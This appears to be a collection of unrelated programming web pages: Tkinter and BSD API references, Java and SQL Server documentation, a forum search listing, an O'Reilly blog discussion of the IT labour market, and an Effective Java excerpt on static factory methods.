 - foreground= - Text color. Default is system specific. (foreground/Foreground)
 - format= - Format string. No default value. (format/Format)
 - from= - The minimum value. Used together with to to limit the spinbox range. Note that from is a reserved Python keyword. To use this as a keyword argument, add an underscore (from_). (from/From)
 - highlightbackground= - Default is system specific. (highlightBackground/HighlightBackground)
 - highlightcolor= - Default is system specific. (highlightColor/HighlightColor)
 - highlightthickness= - No default value. (highlightThickness/HighlightThickness)
 - increment= - Default is 1.0. (increment/Increment)
 - invalidcommand= - No default value. (invalidCommand/InvalidCommand)
 - invcmd= - Same as invalidcommand.
 - justify= - Default is LEFT. (justify/Justify)
 - readonlybackground= - Default is system specific. (readonlyBackground/ReadonlyBackground)
 - relief= - Default is SUNKEN. (relief/Relief)
 - repeatdelay= - Together with repeatinterval, this option controls button auto-repeat. Both values are given in milliseconds.
(repeatDelay/RepeatDelay)
 - repeatinterval= - See repeatdelay. (repeatInterval/RepeatInterval)
 - selectbackground= - Default is system specific. (selectBackground/Foreground)
 - selectborderwidth= - No default value. (selectBorderWidth/BorderWidth)
 - selectforeground= - Default is system specific. (selectForeground/Background)
 - state= - One of NORMAL, DISABLED, or "readonly". Default is NORMAL.
 - textvariable= - No default value. (textVariable/Variable)
 - to= - See from. (to/To)
 - validate= - Validation mode. Default is NONE. (validate/Validate)
 - validatecommand= - Validation callback. No default value. (validateCommand/ValidateCommand)
 - values= - A tuple containing valid values for this widget. Overrides from/to/increment. (values/Values)
 - vcmd= - Same as validatecommand.
 - width= - Widget width, in character units. Default is 20. (width/Width)
 - wrap= - If true, the up and down buttons will wrap around. (wrap/Wrap)
 - xscrollcommand= - Used to connect a spinbox field to a horizontal scrollbar. This option should be set to the set method of the corresponding scrollbar. (xScrollCommand/ScrollCommand)
- delete(first, last=None): Deletes one or more characters from the spinbox.
- get(): Returns the current contents of the spinbox.
 - Returns: The widget contents, as a string.
- icursor(index): Moves the insertion cursor to the given index. This also sets the INSERT index.
 - index - Where to move the cursor.
- identify(x, y): Identifies the widget element at the given location.
 - Returns: One of "none", "buttondown", "buttonup", or "entry".
- index(index): Gets the numerical position corresponding to the given index.
 - index - An index.
 - Returns: The corresponding numerical index.
- insert(index, text): Inserts text at the given index. Use insert(INSERT, text) to insert text at the cursor, insert(END, text) to append text to the spinbox.
 - index - Where to insert the text.
 - text - The text to insert.
- invoke(element): Invokes a spinbox button.
 - element - What button to invoke. Must be one of "buttonup" or "buttondown".
- selection_adjust(index): Adjusts the selection to also include the given character. If index is already selected, do nothing.
 - index - The index.
- selection_clear(): Clears the selection.
- selection_element(element=None): Selects an element. If no element is specified, this method returns the current element.
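The validate/validatecommand options above are easiest to understand with the callback written out. Below is a hypothetical sketch (the function and variable names are mine, not from the reference); the Tk wiring is left in comments so the snippet runs without a display, since the validation logic itself is plain Python:

```python
def make_range_validator(lo, hi):
    """Return a validatecommand-style callback that accepts only
    integers between lo and hi (or an empty field while editing)."""
    def validate(proposed):
        if proposed == "":          # allow clearing the field
            return True
        try:
            return lo <= int(proposed) <= hi
        except ValueError:
            return False            # reject non-numeric input
    return validate

# Wiring it to a Spinbox (requires a running Tk display; "%P" passes
# the proposed new value to the callback on every keystroke):
#   vcmd = (master.register(make_range_validator(0, 10)), "%P")
#   w = Spinbox(master, from_=0, to=10, validate="key", validatecommand=vcmd)

validate = make_range_validator(0, 10)
print(validate("7"), validate("42"), validate("abc"))  # True False False
```

If the callback returns False, Tk rejects the edit and calls invalidcommand (if one is set), which is how the two options in the list above cooperate.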
http://www.effbot.org/tkinterbook/spinbox.htm
GETRLIMIT(2)              BSD Programmer's Manual              GETRLIMIT(2)

NAME
     getrlimit, setrlimit - control maximum system resource consumption

SYNOPSIS
     #include <sys/types.h>
     #include <sys/time.h>
     #include <sys/resource.h>

DESCRIPTION
     Resource limits include:

     RLIMIT_CORE   The largest size (in bytes) core file that may be created.

     RLIMIT_CPU    The maximum amount of CPU time (in seconds) to be used by
                   each process.

     RLIMIT_TIME   The maximum amount of human ...
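For a quick look at these limits without writing C, Python's standard resource module wraps the same getrlimit()/setrlimit() calls; a small sketch:

```python
import resource  # standard library wrapper around getrlimit(2)/setrlimit(2)

# Query the soft and hard limits for CPU time (seconds), like getrlimit(2).
soft, hard = resource.getrlimit(resource.RLIMIT_CPU)

def fmt(v):
    return "unlimited" if v == resource.RLIM_INFINITY else v

print("RLIMIT_CPU soft:", fmt(soft), "hard:", fmt(hard))

# setrlimit(2): a process may lower its limits freely, but may raise the
# hard limit only with appropriate privilege. Re-applying the current
# values is always legal.
resource.setrlimit(resource.RLIMIT_CPU, (soft, hard))
```

The same pattern works for the other RLIMIT_* constants the page describes (RLIMIT_CORE, RLIMIT_DATA, and so on), subject to what the host kernel exposes.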
https://www.mirbsd.org/htman/sparc/man2/setrlimit.htm
Search: Search took 0.03 seconds.
- 16 Dec 2009 4:10 PM Was using ExtJS 3.0. Have upgraded to 3.0.3 and it's still not playing ball (i.e. "namespace":"myNs" is not being appended to the extdirect_api.js file). I can confirm that the same files work...
- 15 Dec 2009 1:54 PM Hi Dan, I'm assuming that if I set 'action_namespace', I should then call the direct functions using the namespace? Specifically, if I use your multiply example as an action in a module called...
- 9 Dec 2009 3:42 PM Cool. I'll have a play and let you know. W :-)
- 9 Dec 2009 2:30 PM Thanks for this Dan, it's great! I'm starting a new project, and wondered if anyone has this working with 1.3/4, or should I stick to 1.2? I can't see anything in the source that would stop it...
- 16 Nov 2009 11:22 AM - Replies - 2 - Views - 1,352 Thank you for taking the time to reply :-)
- 13 Nov 2009 11:36 AM - Replies - 2 - Views - 1,352 I have a n00bish question... I'm trying to follow Saki's big app method, but have got stuck. I'm not sure how you add a handler for a button bar to its parent viewport onRender function. Example code...
- 3 Jul 2009 9:55 AM I'm such a wally. The plugin parses the actions files, not the model files. Putting the commented function in the actions.class.php file fixed everything.
- 2 Jul 2009 11:37 AM I'm still learning symfony, and am keen to use this plugin. I can't seem to get it to work though. Could you tell me where I went wrong here? Following the instructions in the readme, and using the...
Results 1 to 8 of 8
https://www.sencha.com/forum/search.php?s=79f50cbfb646fc9ae40d38649a6e3036&searchid=12492388
This section leads you through the steps needed to compile and run a simple example client application, HelloWorldMessage, that sends a message to a destination and then retrieves the same message from the destination. The code shown in Example 1–2 is adapted and simplified from an example program provided with the Message Queue installation: error checking and status reporting have been removed for the sake of conceptual clarity. You can find the complete original program in the helloworld directory in the following locations.

Solaris: /usr/demo/imq/
Linux: opt/sun/mq/examples
Windows: IMQ_HOME/demo

To compile and run Java clients in a Message Queue environment, it is recommended that you use the Java 2 SDK, Standard Edition, version 1.4 or later. You can download the recommended SDK from the following location: Be sure to set your CLASSPATH environment variable correctly, as described in Setting Up Your Environment, before attempting to compile or run a client application. If you are using JDK 1.5, you will get compiler errors if you use the unqualified JMS Queue class along with the following import statement:

import java.util.*;

This is because the packages java.util and javax.jms both contain a class named Queue. To avoid the compilation errors, you must eliminate the ambiguity by either fully qualifying references to the JMS Queue class as javax.jms.Queue or correcting your import statements to refer to specific individual java.util classes. The following steps for compiling and running the HelloWorldMessage application are furnished strictly as an example. The program is shipped precompiled; you do not actually need to compile it yourself (unless, of course, you modify its source code). Make:
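The Queue name clash is easy to reproduce without a Message Queue installation at all: any type named Queue in scope makes the bare name ambiguous under a wildcard import, and fully qualifying java.util.Queue resolves it. A minimal sketch (the class and method names here are illustrative, not from the example program):

```java
// A stand-in for javax.jms.Queue: any visible type named Queue makes the
// bare name "Queue" ambiguous when combined with "import java.util.*;".
interface Queue {
    String getQueueName();
}

class QueueClash {
    // Fully qualified java.util.Queue: no ambiguity with the Queue above.
    static java.util.Queue<String> makeUtilQueue() {
        java.util.Queue<String> q = new java.util.ArrayDeque<>();
        q.add("hello");
        q.add("world");
        return q;
    }

    public static void main(String[] args) {
        System.out.println(makeUtilQueue().size()); // prints 2
    }
}
```

The alternative fix the text mentions works the same way in reverse: drop the wildcard and import only the specific java.util classes you need, leaving the bare name Queue free for javax.jms.Queue.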
http://docs.oracle.com/cd/E19906-01/820-5205/aeqau/index.html
Supported .NET Framework Libraries With the common language runtime (CLR) hosted in SQL Server 2005, you can author stored procedures, triggers, user-defined functions, user-defined types, and user-defined aggregates in managed code. With the functionality found in the .NET Framework Library, you have access to pre-built classes that provide functionality for string manipulation, advanced math operations, file access, cryptography, and more. These classes can be accessed from any managed stored procedure, user-defined type, trigger, user-defined function, or user-defined aggregate. SQL Server 2005 has a list of supported .NET Framework libraries, which have been tested to ensure that they meet reliability and security standards for interaction with SQL Server 2005. Supported libraries do not need to be explicitly registered on the server before they can be used in your code; SQL Server loads them directly from the Global Assembly Cache (GAC). The libraries/namespaces supported by CLR integration in SQL Server 2005 are: - CustomMarshalers - Microsoft.VisualBasic - Microsoft.VisualC - mscorlib - System - System.Configuration - System.Data - System.Data.OracleClient - System.Data.SqlXml - System.Deployment - System.Security - System.Transactions - System.Web.Services - System.Xml.
https://msdn.microsoft.com/en-US/library/ms403279(v=sql.90).aspx
Your Account by Kurt Cagle Does that change the economic picture? It means tool and license costs figure more in those projects that don't rely on open source, that mixed open and closed source systems (say ASP and PostGreSQL) are a bigger part of the mix, and that programming as a profession becomes even more of a tradecraft job with less status and possibly less women in the trade. It also means being multilingual at least to the ability to work well in a shop where accents and skills cause every third word to be lost, and it means increased emphasis on the documentation process. Somehow we get through these crunching changes but it is ever more evident that tradecraft level programming will become a supporting skill that many professions will require in addition to the principal skill set. The number of to-the-metal programmers can wax and wane and that will slow down the framework churn (do we need another word processor?) which might be a good thing. More importantly, however, is that the landscape for Network Engineers, Database Administrators and Systems Administrators is even more tight than for Developers, and these folks represent a critical part of the IT chain as well... It's a good time to be in IT, and many of the organizations that have resorted to off-shoring simply for cost reasons will find that the costs have been rearranged, not eliminated. I'm familiar with the developer landscape, somewhat less so for the administrative side of things, though I would agree with you that if anything this sector is likely to be even more squeezed than the dev side will be. IT admins tend to be as much as a decade older, and usually have received considerable advanced training. 
Unlike the developer workforce, IT admins are much closer to retirement, and if the age of offshoring has affected developers, it has also meant that many organizations have chosen to have only one or at best two admins in a given slot, making them vulnerable to both retirement and poaching. I've also wondered more than once whether the graphical approach that Microsoft has taken in its GUI admin tools may be backfiring. Such tools make it easier to administer sites, but at the cost typically of less understanding of what is in fact happening in the background. Admin positions especially tend to be trained on the job, and I suspect that this lack of understanding will propagate to the newer admins as a consequence. -- Kurt You know, it's funny, but I've been waiting for drag and drop programming for years, expecting with each subsequent generation of dev tools that we'll finally drop below the threshold at which programming becomes easy enough for the non-programmer. Curiously, it never quite seems to come. JavaScript or Ruby are arguably simpler than Java or C++, but they're being used increasingly to handle distributed computing where the efficiencies of formal type declaration get lost and the costs of such become quite real. Indeed, what I find intriguing is that JavaScript as a language is evolving into something much more evocative of Lisp or Scheme than the fairly basic language it started out from. I think programming has become more component oriented, which means that you can break down programming more into web developer vs. web designer roles (or app developer or app designer roles) but I don't necessarily think we're even close yet to the drag and drop level of programming, and I'm becoming increasingly convinced that we won't ever be. Programming is the art of dealing with complexity, and all that componentization does is expand the baseline of what can be done. Drag and drop is pretty common in the ASP.NET world. 
It doesn't mean one doesn't program; just that the need for lots of to-the-metal programmers has been reduced significantly. I'm not saying one doesn't need component builders, just fewer of them. The size of a site that can be built and maintained by a handful of skilled and skill sets continues to increase without significant increases in cost. completely disagreeing with you on this - I think that componentization is significantly streamlining production, though given the number of software projects that continue to fail compared to the overall number, I'm not really sure that it's really making that much difference. Certainly, one of the key effects that componentization (and standardization, which is just componentization of process) has is that it does, as you say, shift software production towards a different model, though I'm not sure that the assembly line is the right metaphor here. I think its worthwhile to differentiate here between the big software project and the small one. Componentization makes it possible for small software projects to be carried out by fewer people, but those people generally serve more to determine which components to use and then perform the necessary integration. While programmers may (and likely do) specialize, they typically are still experts of the pieces in their domain. Admittedly, if you talk about a modern assembly line, I'd say the analogy is closer, because in those cases most repetitive operations have been automated, and the occasional person exists primarily as a decision maker, as a designer (which is a decision maker of a different sort), or as a maintenance worker to keep the machines humming. Significantly, all three of these sets of skills require a high degree of training and education, and all three represent a fairly significant degree of autonomy. I also suspect that the H1B defeat in the Senate may very well end up hurting the software companies, though not IT in general. 
I do not buy the contention of the BSA or other software company alliances that the H1B visas are truly necessary - they represent cheap labor for these companies, who are now going to be forced to pay more for the home grown variety, but I suspect that global demand for software talent and services will only grow with time (because customization is, ultimately, the metier of programmers). Software companies exist to create "business components" - software that fulfills a certain requirement broadly enough that a large number of companies (or individuals) will buy that software. Customization is a countervailing force to commoditization - software companies want to create commodities, because they make less money when they sell to fewer customers (especially in the face of rising labor prices). Customization, on the other hand, is what the customers want - applications that are written specifically to their needs and wants, and while price is certainly a factor, it's not the only one. Open source works on a purely economic level because it makes the cost of the components cheap to non-existent, which in turn means that the primary costs become the integrational labor (the customization labor) - though it also has the effect of pushing down the price of proprietary components. Note additionally that as the components themselves become more complex, the amount of work necessary to integrate those components to the specific needs of the company also increases.
I think as the number of components continue to rise and the capabilities of the components themselves evolve, the focus will shift increasingly to the second group, but I'm not sure their job is necessary any easier, it just works at a larger scope - the requirements gathering and analysis phases, distributed computational systems, and so forth that you mentioned in your first comment. Those are engineering tasks, not manufacturing ones. I did want to dissect one of your statements in greater detail: a big fan of large corporations, in general. They tend to resemble feudal fiefdoms far too closely for me to take a lot of comfort in their existence. Thus when I hear the talk about labor shortages by companies, I usually take a look at where they are getting there work done first, and by whom. I do tend to believe that the current crunch is due in part to the dawning realization on the part of the hiring agencies at these corporations that global demand for engineering talent is on the rise, and their ability to bring in lower priced talent from outside is diminishing. Moreover, demand tends to beget supply, though I suspect that, just as in the case of the oil companies not building up their infrastructure at times where demand is low (because they spent money on fancy buildings, extravagant parties, etc. when the money was there), their ability to move people through the hiring pipeline is currently fairly impaired. Will the pendulum swing the other way? Certainly, though not for some years yet. There was a huge glut of people that entered IT in the mid-1990s, most driven by IPO madness, just as there was a huge glut of people that entered into real estate services in the early part of this decade. IT had a fairly significant shaking out during the tech winter (just as it's probably not a good time to be in mortgage banking right now). 
This glut coincided with the rise of the Internet, the rise of component oriented software development, the dramatic increase in the number of powerful PCs, and not coincidentally the entry of the GenXers into the marketplace. We're now just off the peak of that population wave, heading down. There's a minor peak - the grandchildren of the boomers, on its way in about seven years, and the children of the GenXers, the Millenial babies, are now in second grade (my youngest was born in 2000, so she's at the very forefront of that next generation), so they'll enter the workforce in significant numbers in 2020. Significantly, both of these peaks are actually smaller than the boomers (the millennial generation is significant in that it occurred at a time when the birth rate fell below the replacement rate), though because they overlap somewhat, you'll actually have two pulses spaced about five years apart with a plateau (and maybe a minor secondary peak) in between them. Thus, things ought to look pretty good for programmers in general for the next five to seven years on demographics alone. Of course, by then, the interesting areas will likely be in bioinformatics and biocybernetics, nanotech derivative efforts in materials science, energy systems, robotics and aerospace, and pure information sciences will look positively primitive in comparison. If I was graduating from college now, I'd not be interested in information technologies, unless it was a minor to some other areas such as biology or space systems. You will still need programmers, of course, but the skilled engineers will be cross discipline, and the business programmer will look positively antiquated, which needs to be taken into account. 1. Note Spolsky's article on hiring programmers that Elliotte pointed out. Note the need for non-programming skills beyond the need for ATL knowledge. English proficiency rates highly. 
These non-tech skills are becoming another limiting factor, but they are also a force pushing us to invent new ways to communicate. As the tech lead for a team that includes two non-native English speakers, it makes a difference, but not one I can't overcome.

2. Note the articles starting with T. Bray's reference to the DevChix complaints about leering, bullying males. Note the comments about declining numbers of women in the business. There are social status forces at work here too.

How far that will go depends a lot on the analysis and design of the classes. I'm fascinated by the ASP 2.0 changes to the framework and where the difficulty shifted. It turns out I had to find a blog commenting on that, because MS never tells one this in a place one can find reasonably quickly. So a software design feature wastes a half day of production because a) it is counterintuitive to experience and b) no one bothered to document it transparently. So even with the componentization, we lose time in the complexity of the hidden couplers: technical, social, skills, and competence. Costs are hard to track, but it is clearly evident that for the scale of software projects we can deploy, we need fewer workers. Unless of course one is taken over by a distant equity firm that demands absolute control AND cost cutting, thus increasing the numbers of bean counters (Process Design: One Person == One Fact. NeXt), slowing down production and ultimately failing to create value with a company except at the point of resale. Weird, but it seems there is no lack of suckers for voodoo economics in the world today (Yes! Matilda Build Virtually And Cash Out Real Before the Pyramid Collapses!).

Does the economic picture change? We rely on computers in ways we never have in the past, and this sea change is of such recent emergence that we actually don't know what will result based on experience, other than, as I said, things speed up.
Will we develop more efficient communication, more efficient production based on more efficient tools, better social skills, or just learn to accept that as the status of being a computer professional drops, some will go elsewhere to find status? If so, then salaries rise and perhaps, in social terms, go back to being what they were in the 70s relative to today's costs of living. As that happens, the status point shifts and the flow tips back in the other direction. We've seen this before in America. The Space Program cranked out a lot of engineers and practically created the modern software market. Then in 1971, it began to die at an incredible rate. Then it picked up when a combination of technology and economic forces put the money back into the market.

<snip>Note the need for non-programming skills beyond the need for ATL knowledge. English proficiency rates highly.</snip>

One of the reasons I suspect that the Indian outsource market has outperformed the Chinese: India has 100+ years of British colonialism to ensure that English is still largely a near-native language for their technical workforce. More people worldwide speak Chinese than English, but most of those people are concentrated in China, whereas English is a second language almost everywhere it's not a primary one.

<snip>Note the comments about declining numbers of women in the business. There are social status forces at work here too.</snip>

Absolutely. Programming has long been dominated by young (not terribly well socialized) males, as much for socioeconomic reasons as anything, and young men are notorious for using their work environment to establish their social position (my code's cleaner|more compact|more elegant|whatever than your code). That's a topic for another time, however.

<snip>(...)</snip>

Yes, though this comes with the danger of biasing the business logic towards the Microsoft way of doing things. Still, 'tis a good point.

<snip>(...)
So a software design feature wastes a half day of production because a) it is counter intuitive to experience and b) no one bothered to document it transparently.</snip>

Componentization is hard ... even after more than twenty years of doing it myself, I find the process of task decomposition to be a remarkably difficult and treacherous discipline, very much analogous to the designing of good schemas. The irony here is that the process of creating such components is in some respects becoming easier than the process of designing what the components should do in the first place (namespaces!! Aaaargghh!!!).

<snip>So even with the componentization, we lose time in complexity of the hidden couplers, technical, social, skills, and competence. Costs are hard to track but it is clearly evident that for the scale of software projects we can deploy, we need fewer workers.</snip>

Granted. However, we have fewer workers. The question that I think will shape the software development universe is whether the declining pool of technically competent workers is in fact still larger than the declining pool of programming and IT slots. If the problem is simple economics (software producers are not willing to pay for local talent so long as less expensive remote talent exists), then the solution will be market driven: if the value proposition of the product exceeds the cost of hiring the programmer by some currently unknown factor, then salaries will go up until that is no longer true. If the problem, on the other hand, is fewer trained programmers and a collapsed training pipeline, then production will slow until stasis is reached.
<snip>Unless of course one is taken over by a distant equity firm that demands absolute control AND cost cutting, thus increasing the numbers of bean counters.</snip>

For every project that has failed because of insufficient software, I'd wager that ten have failed due to building too many layers of bureaucracy, with each bureaucrat justifying their existence by imposing more and more oversight on software projects. Some oversight is necessary; a great deal of it is highly counterproductive.

<snip>(...)</snip>

It's coming soon. The biggest constraint on it happening now is that we require a level of accountability and legibility in our software that computers generally cannot produce (computers are poor at creating abstractions at this stage, which is one of the keys to complexity management). As applications become more complex (thinking in the distributed network realm here), I suspect we're reaching a point where the level of computational complexity is so high that we may have no choice but to let computers work at their own level of abstraction and constrain the results, especially in the realm of distributed computing. I'm not sure that will signal the end of programming as a human discipline, but it will certainly alter the balance of power between man and machine in ways that aren't even remotely known.

© 2015, O'Reilly Media, Inc.
http://archive.oreilly.com/pub/post/the_coming_tech_labor_crunch.html
VMInterfaceFunctions_ Struct Reference

#include <vmi.h>

- GetJavaVM: Return the JNI JavaVM associated with the VM interface.

      JavaVM* JNICALL GetJavaVM(VMInterface* vmi);

- GetPortLibrary: Return a pointer to an initialized HyPortLibrary structure. The port library is a table of functions that implement useful platform-specific capabilities, for example file and socket manipulation, memory management, etc. It is the responsibility of the VM to create the port library.

      HyPortLibrary* JNICALL GetPortLibrary(VMInterface* vmi);

- Return a pointer to a HyVMLSFunctionTable. This is a table of functions for allocating, freeing, getting, and setting thread local storage.

- (Only if HY_ZIP_API is not defined) Return a pointer to the HyZipCachePool structure used by the VM. It is the responsibility of the VM to allocate the pool using zipCachePool_new().

- GetInitArgs: Return a pointer to a JavaVMInitArgs structure as defined by the JNI 1.2 specification. This structure contains the arguments used to invoke the VM.

      JavaVMInitArgs* JNICALL GetInitArgs(VMInterface* vmi);

Generated on Tue Mar 11 19:25:27 2008 by Doxygen. (c) Copyright 2005, 2008 The Apache Software Foundation or its licensors, as applicable.
http://harmony.apache.org/subcomponents/drlvm/doxygen/intf/html/struct_v_m_interface_functions__.html
Q: Null pointer exceptions

I am getting a NullPointerException in the following code:

    import java.util.*;

    public class employee {
        static int ch;
        static int emp[];
        String name;
        int id, age;
        float sal;

        void insert() {
            employee[] emp = new employee[90];
            Scanner r...
        }
    }

A: A NullPointerException is thrown at run time when code dereferences a null value: reading or modifying a field of a reference that is null, calling a method on it, or using an array element that was never assigned. Note that new employee[90] allocates the array itself but leaves every element null; each element must be assigned an employee object before its fields are used. A try/catch block can be helpful in handling null pointer exceptions, but checking for null before use is the better fix.
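To make the failure mode concrete, here is a minimal, self-contained sketch (class and field names are illustrative, not taken from the question above) showing that allocating an array of objects does not allocate its elements, and how a null check avoids the exception:

```java
public class NullElementDemo {
    static class Employee {
        String name;
        Employee(String name) { this.name = name; }
    }

    // Returns the name at index i, or a fallback when the slot was never filled.
    static String nameAt(Employee[] staff, int i) {
        Employee e = staff[i];
        return (e == null) ? "<unassigned>" : e.name; // null check instead of try/catch
    }

    public static void main(String[] args) {
        Employee[] staff = new Employee[3]; // allocates the array; every element is null
        staff[0] = new Employee("Asha");    // only slot 0 is populated

        System.out.println(nameAt(staff, 0)); // Asha
        System.out.println(nameAt(staff, 1)); // <unassigned>

        try {
            System.out.println(staff[1].name); // dereferences null -> NullPointerException
        } catch (NullPointerException npe) {
            System.out.println("caught NPE");
        }
    }
}
```

The catch block demonstrates the exception only; in real code the null check in nameAt is preferable to catching NullPointerException.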
http://roseindia.net/tutorialhelp/comment/81095
Part 1 of this article covers three items that involve creating and destroying Java objects. This article concerns creating and destroying Java objects: when and how to create them, when and how to avoid creating them, how to ensure they are destroyed in a timely manner, and how to manage any cleanup actions that must precede their destruction.

Note that a static factory method is not the same as the Factory Method pattern from Design Patterns: Elements of Reusable Object-Oriented Software, by Erich Gamma et al. [Gamma95, p. 107]. The static factory method described in this item has no direct equivalent in Design Patterns.

If the parameters to a constructor do not, in and of themselves, describe the object being returned, a static factory with a well-chosen name is easier to use and the resulting client code easier to read. For example, the constructor BigInteger(int, int, Random), which returns a BigInteger that is probably prime, would have been better expressed as a static factory method named BigInteger.probablePrime. (This method was eventually added, in the 1.4 release.)

Because they have names, static factory methods don't share the restriction that a class can have only one constructor with a given signature. In cases where a class seems to require multiple constructors with the same signature, replace the constructors with static factory methods and carefully chosen names to highlight their differences.

A second advantage of static factory methods is that, unlike constructors, they are not required to create a new object each time they're invoked. This allows immutable classes (Item 15) to use preconstructed instances, or to cache instances as they're constructed, and dispense them repeatedly to avoid creating unnecessary duplicate objects. The Boolean.valueOf(boolean) method illustrates this technique: it never creates an object. This technique is similar to the Flyweight pattern [Gamma95, p. 195]. It can greatly improve performance if equivalent objects are requested often, especially if they are expensive to create.

The ability of static factory methods to return the same object from repeated invocations allows classes to maintain strict control over what instances exist at any time. Classes that do this are said to be instance-controlled.
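Both advantages can be sketched in a few lines. The class below is a made-up example, not from the text: it uses named static factories in place of two constructors that would need the same signature, and it dispenses a preconstructed instance the way Boolean.valueOf does.

```java
// Illustrative sketch: named static factories plus instance caching.
public final class Temperature {
    private static final Temperature FREEZING = new Temperature(0.0); // preconstructed, shared
    private final double celsius;

    private Temperature(double celsius) { this.celsius = celsius; } // no public constructor

    // Two factories that would otherwise require two constructors with the
    // same signature (double) -- the names make the unit explicit at the call site.
    public static Temperature ofCelsius(double c) {
        return (c == 0.0) ? FREEZING : new Temperature(c); // dispense the cached instance
    }

    public static Temperature ofFahrenheit(double f) {
        return ofCelsius((f - 32.0) * 5.0 / 9.0);
    }

    public double celsius() { return celsius; }
}
```

Because ofCelsius(0.0) always returns the same cached object, clients could even compare freezing points with ==, the same guarantee Boolean.valueOf provides for its two instances.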
There are several reasons to write instance-controlled classes. Instance control allows a class to guarantee that it is a singleton (Item 3) or noninstantiable (Item 4). Also, it allows an immutable class (Item 15) to make the guarantee that no two equal instances exist: a.equals(b) if and only if a==b. If a class makes this guarantee, then its clients can use the == operator instead of the equals(Object) method, which may result in improved performance. Enum types (Item 30) provide this guarantee. A third advantage of static factory methods is that, unlike constructors, they can return an object of any subtype of their return type. This gives you great flexibility in choosing the class of the returned object. One application of this flexibility is that an API can return objects without making their classes public. Hiding implementation classes in this fashion leads to a very compact API. This technique lends itself to interface-based frameworks (Item 18), where interfaces provide natural return types for static factory methods. Interfaces can't have static methods, so by convention, static factory methods for an interface named Type are put in a noninstantiable class (Item 4) named Types. For example, the Java Collections Framework has 32 convenience implementations of its collection interfaces, providing unmodifiable collections, synchronized collections, and the like. Nearly all of these implementations are exported via static factory methods in one noninstantiable class ( java.util.Collections). The classes of the returned objects are all nonpublic. The Collections Framework API is much smaller than it would have been had it exported 32 separate public classes, one for each convenience implementation. It is not just the bulk of the API that is reduced, but the conceptual weight. The user knows that the returned object has precisely the API specified by its interface, so there is no need to read additional class documentation for the implementation classes. 
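A toy version of this convention (all names invented for illustration) might look like the following: the interface Shape gets its factories from a noninstantiable companion class Shapes, and the implementation class stays hidden from clients.

```java
// Interface-based framework sketch: clients see only Shape and Shapes.
interface Shape {
    double area();
}

final class Shapes {
    private Shapes() { } // noninstantiable companion class

    // Nonpublic implementation class: invisible to clients of the API.
    private static final class Circle implements Shape {
        private final double r;
        Circle(double r) { this.r = r; }
        public double area() { return Math.PI * r * r; }
    }

    // Static factory returns a subtype of its declared return type.
    public static Shape circle(double radius) {
        if (radius < 0) throw new IllegalArgumentException("radius < 0");
        return new Circle(radius);
    }
}
```

Clients refer to the result only as a Shape, so a later release could replace Circle with a different implementation without any client code changing.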
Furthermore, using such a static factory method requires the client to refer to the returned object by its interface rather than its implementation class, which is generally good practice (Item 52). Not only can the class of an object returned by a public static factory method be nonpublic, but the class can vary from invocation to invocation depending on the values of the parameters to the static factory. Any class that is a subtype of the declared return type is permissible. The class of the returned object can also vary from release to release for enhanced software maintainability and performance. The class java.util.EnumSet (Item 32), introduced in release 1.5, has no public constructors, only static factories. They return one of two implementations, depending on the size of the underlying enum type: if it has 64 or fewer elements, as most enum types do, the static factories return a RegularEnumSet instance, which is backed by a single long; if the enum type has 65 or more elements, the factories return a JumboEnumSet instance, backed by a long array. The existence of these two implementation classes is invisible to clients. If RegularEnumSet ceased to offer performance advantages for small enum types, it could be eliminated from a future release with no ill effects. Similarly, a future release could add a third or fourth implementation of EnumSet if it proved beneficial for performance. Clients neither know nor care about the class of the object they get back from the factory; they care only that it is some subclass of EnumSet. The class of the object returned by a static factory method need not even exist at the time the class containing the method is written. Such flexible static factory methods form the basis of service provider frameworks, such as the Java Database Connectivity API (JDBC). 
A service provider framework is a system in which multiple service providers implement a service, and the system makes the implementations available to its clients, decoupling them from the implementations. There are three essential components of a service provider framework: a service interface, which providers implement; a provider registration API, which the system uses to register implementations, giving clients access to them; and a service access API, which clients use to obtain an instance of the service. The service access API typically allows but does not require the client to specify some criteria for choosing a provider. In the absence of such a specification, the API returns an instance of a default implementation. The service access API is the "flexible static factory" that forms the basis of the service provider framework.

An optional fourth component of a service provider framework is a service provider interface, which providers implement to create instances of their service implementation. In the absence of a service provider interface, implementations are registered by class name and instantiated reflectively (Item 53). In the case of JDBC, Connection plays the part of the service interface, DriverManager.registerDriver is the provider registration API, DriverManager.getConnection is the service access API, and Driver is the service provider interface.

There are numerous variants of the service provider framework pattern. For example, the service access API can return a richer service interface than the one required of the provider, using the Adapter pattern [Gamma95, p. 139]. Here is a simple implementation with a service provider interface and a default provider:

    // Service provider framework sketch

    // Service interface
    public interface Service {
        ... // Service-specific methods go here
    }

    // Service provider interface
    public interface Provider {
        Service newService();
    }

    // Noninstantiable class for service registration and access
    public class Services {
        private Services() { } // Prevents instantiation (Item 4)

        // Maps service names to services
        private static final Map<String, Provider> providers =
            new ConcurrentHashMap<String, Provider>();
        public static final String DEFAULT_PROVIDER_NAME = "<def>";

        // Provider registration API
        public static void registerDefaultProvider(Provider p) {
            registerProvider(DEFAULT_PROVIDER_NAME, p);
        }
        public static void registerProvider(String name, Provider p) {
            providers.put(name, p);
        }

        // Service access API
        public static Service newInstance() {
            return newInstance(DEFAULT_PROVIDER_NAME);
        }
        public static Service newInstance(String name) {
            Provider p = providers.get(name);
            if (p == null)
                throw new IllegalArgumentException(
                    "No provider registered with name: " + name);
            return p.newService();
        }
    }

A fourth advantage of static factory methods is that they reduce the verbosity of creating parameterized type instances. Unfortunately, you must specify the type parameters when you invoke the constructor of a parameterized class even if they're obvious from context. This typically requires you to provide the type parameters twice in quick succession:

    Map<String, List<String>> m = new HashMap<String, List<String>>();

This redundant specification quickly becomes painful as the length and complexity of the type parameters increase. With static factories, however, the compiler can figure out the type parameters for you. This is known as type inference.
For example, suppose that HashMap provided this static factory:

public static <K, V> HashMap<K, V> newInstance() {
    return new HashMap<K, V>();
}

Then you could replace the wordy declaration above with this succinct alternative:

Map<String, List<String>> m = HashMap.newInstance();

Someday the language may perform this sort of type inference on constructor invocations as well as method invocations, but as of release 1.6, it does not. Unfortunately, the standard collection implementations such as HashMap do not have factory methods as of release 1.6, but you can put these methods in your own utility class. More importantly, you can provide such static factories in your own parameterized classes.

The main disadvantage of providing only static factory methods is that classes without public or protected constructors cannot be subclassed. The same is true for nonpublic classes returned by public static factories. For example, it is impossible to subclass any of the convenience implementation classes in the Collections Framework. Arguably this can be a blessing in disguise, as it encourages programmers to use composition instead of inheritance (Item 16).

